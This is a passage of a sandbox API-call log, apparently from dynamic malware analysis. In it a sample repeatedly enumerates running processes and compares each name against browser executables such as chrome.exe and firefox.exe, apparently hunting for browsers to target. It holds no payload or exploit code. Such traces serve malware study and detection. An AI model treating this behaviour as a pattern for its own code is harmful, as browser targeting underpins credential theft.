-1 [0185.337] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0185.337] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0185.337] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0185.337] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0185.337] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0185.337] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0185.338] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0185.338] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0185.338] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0185.338] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0185.338] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0185.338] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0185.338] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0185.338] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0185.338] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.338] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0185.339] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0185.339] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0185.339] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0185.339] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0185.339] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0185.339] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0185.339] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0185.339] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0185.339] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0185.339] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0185.339] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0185.339] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0185.340] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0185.340] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0185.340] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0185.340] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0185.340] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.340] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0185.340] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0185.340] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0185.340] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0185.340] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0185.341] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.341] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0185.341] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0185.341] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0185.341] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0185.341] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0185.341] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.341] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0185.342] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0185.342] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0185.342] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0185.342] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0185.342] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.342] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0185.342] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0185.342] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0185.342] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0185.342] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0185.342] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0185.342] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0185.343] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0185.343] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0185.343] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0185.343] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0185.343] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.343] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0185.343] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0185.343] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0185.343] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0185.343] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0185.343] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.343] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0185.344] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0185.344] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0185.344] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0185.344] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0185.344] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.344] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0185.345] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0185.345] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0185.345] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0185.345] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0185.345] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.345] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0185.345] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0185.345] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0185.345] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0185.345] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0185.345] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.345] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0185.346] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0185.346] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0185.346] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0185.346] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0185.346] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0185.346] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0185.346] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0185.346] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0185.346] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0185.346] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0185.346] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0185.346] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0185.347] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0185.347] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0185.347] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0185.347] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0185.347] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0185.347] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0185.347] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0185.348] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0185.348] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0185.348] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0185.348] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.348] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0185.348] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0185.348] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0185.348] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0185.348] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0185.348] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0185.348] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0185.349] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0185.349] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0185.349] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0185.349] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0185.349] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.349] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0185.349] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0185.349] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0185.349] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0185.349] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0185.349] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.349] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.350] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0185.350] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0185.350] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0185.350] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0185.350] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.350] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0185.350] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0185.350] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0185.351] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0185.351] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0185.351] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.351] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.351] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0185.351] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0185.351] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0185.351] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0185.351] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.351] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0185.352] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0185.352] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0185.352] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0185.352] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0185.352] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.352] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.352] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0185.352] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0185.352] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0185.352] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0185.352] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.352] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0185.353] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0185.353] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0185.353] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0185.353] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0185.353] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0185.353] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0185.353] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0185.353] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0185.353] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0185.354] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0185.354] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.354] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0185.354] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0185.354] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0185.354] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0185.354] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0185.354] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.354] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0185.355] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0185.355] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0185.355] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0185.355] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0185.355] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0185.355] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0185.355] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0185.355] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0185.355] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0185.355] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0185.355] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0185.355] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0185.356] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0185.356] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0185.356] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0185.356] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0185.356] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0185.356] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0185.356] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0185.356] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0185.356] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0185.356] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0185.356] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0185.356] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0185.357] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0185.357] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0185.357] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0185.357] lstrcmpiA (lpString1="gtjtdfe", lpString2="opera.exe") returned -1 [0185.357] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0185.357] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0185.358] CloseHandle (hObject=0xe8) returned 1 [0185.358] Sleep (dwMilliseconds=0x3e8) [0186.367] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0186.369] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0186.369] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0186.369] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0186.369] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0186.369] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0186.369] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0186.369] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, 